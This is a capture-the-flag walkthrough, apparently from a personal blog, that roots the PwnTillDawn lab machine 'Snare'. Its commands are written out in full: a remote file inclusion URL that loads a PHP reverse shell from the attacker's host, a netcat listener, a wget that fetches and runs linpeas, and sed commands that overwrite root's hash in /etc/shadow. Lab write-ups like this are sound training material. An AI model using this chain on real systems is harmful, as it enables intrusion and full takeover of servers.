Nick Chua Logo
Boot2Root

Snare | 10.150.150.18 | PwnTillDawn

Date Published

Try this machine here ->

We will take a look at Snare (10.150.150.18) machine in PwnTillDawn.

Enumeration

We will begin with our Nmap scan

1sudo nmap -v -p- -sC -sV 10.150.150.18 --open
2

3PORT   STATE SERVICE VERSION
422/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5| ssh-hostkey: 
6|   3072 2f:0e:73:d4:ae:73:14:7e:c5:1c:15:84:ef:45:a4:d1 (RSA)
7|   256 39:0b:0b:c9:86:c9:8e:b5:2b:0c:39:c7:63:ec:e2:10 (ECDSA)
8|_  256 f6:bf:c5:03:5b:df:e5:e1:f4:da:ac:1e:b2:07:88:2f (ED25519)
980/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
10| http-methods: 
11|_  Supported Methods: GET HEAD POST OPTIONS
12| http-title: Welcome to my homepage!
13|_Requested resource was /index.php?page=home
14|_http-server-header: Apache/2.4.41 (Ubuntu)
15Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 22 and 80 are open.

We will fire up our web browser and visit 10.150.150.18.

Observing the behavior of the web application, the URL query parameter changes whenever we navigate from Home, About Us and Contact.

The page parameter is suspicious enough to let us test for Remote File Inclusion vulnerability.

We can test for RFI vulnerability by opening a Python server in our terminal

1python3 -m http.server 80

Next, modify the URL page parameter to point to our ip address

1http://10.150.150.18/index.php?page=http://10.66.66.254/

We can see that the target web server has made a request to our python server. RFI is evident and it is requesting a file with the .php extension.

Exploitation

Let us visit revshells to get the PHP reverse shell payload, since the application's backend uses PHP.

We will input our IP address, port number and select PHP Ivan Sincek reverse shell option.

Next, copy the payload into our machine and save it is webshell.php.

We will open our netcat listener with rlwrap at port 8080


1rlwrap nc -nlvp 8080

Now, send the URL request:

1http://10.150.150.18/index.php?page=http://10.66.66.254/webshell

We have caught the reverse shell in our netcat listener.

Privilege Escalation

Let us stabilize our shell. We will run

1python3 -c "import pty; pty.spawn('/bin/bash')"

Next, transfer our linpeas.sh binary from our Kali machine to the target machine.

Firstly, go to our Kali machine and open a python server at the folder containing the linpeas.sh binary.

1python3 -m http.server 80

Secondly, navigate to the /tmp directory of our target machine. Now, we can run wget to download the file from our Kali machine to our target machine

1wget 10.66.66.254/linpeas.sh

After the file is downloaded, we will give it executable permission before running the linpeas.sh script

1chmod +x linpeas.sh
2./linpeas.sh

Linpeas has highlighted to us that /etc/shadow is writable which is a strong approach for us to get root!

The key idea is to generate a password hash for a password we know and replacing the current root user's password hash in the /etc/shadow file.

1mkpasswd -m sha-512 'P@ssword123!'
2$6$lJD6ylm1R6Uzk72q$E26NRy.uptSZV0EF6VhFRqb8pdM3t2ezNNHZ77Dk4p/oQQg3O9dYsee11L7E5BrkotLmN0Z3iFAOW03Aj3wlF0

Next, replace the existing hash (everything between the first and second colon) for root with our newly generated hash.

In our target machine

1NEW_HASH='$6$lJD6ylm1R6Uzk72q$E26NRy.uptSZV0EF6VhFRqb8pdM3t2ezNNHZ77Dk4p/oQQg3O9dYsee11L7E5BrkotLmN0Z3iFAOW03Aj3wlF0'
2sed -E "s|^(root:)[^:]*:|\1${NEW_HASH}:|" /etc/shadow

The sed command prints the modified file to stdout (safe preview). We use a delimiter that won’t clash with / in the hash (so | is nice).

The core regex we want:

  • ^root: → only the root line
  • [^:]* → “anything that isn’t a colon” (i.e., field 2)
  • then the next : → stop exactly at end of field 2

The clean way is: match only the root: line, and replace only up to the next :.

Actually write it back (without relying on sed -i)

/etc/shadow may be writable but /etc directory may not allow renames, so sed -i can fail. This method overwrites the existing file content instead of renaming:

1sed -E "s|^(root:)[^:]*:|\1${NEW_HASH}:|" /etc/shadow > /tmp/shadow.new
2cat /tmp/shadow.new > /etc/shadow

With the password hash for root overwritten, we can change to the root user with the password P@ssword123!

1su root
2P@ssword123!

Snare is rooted. Thanks for reading!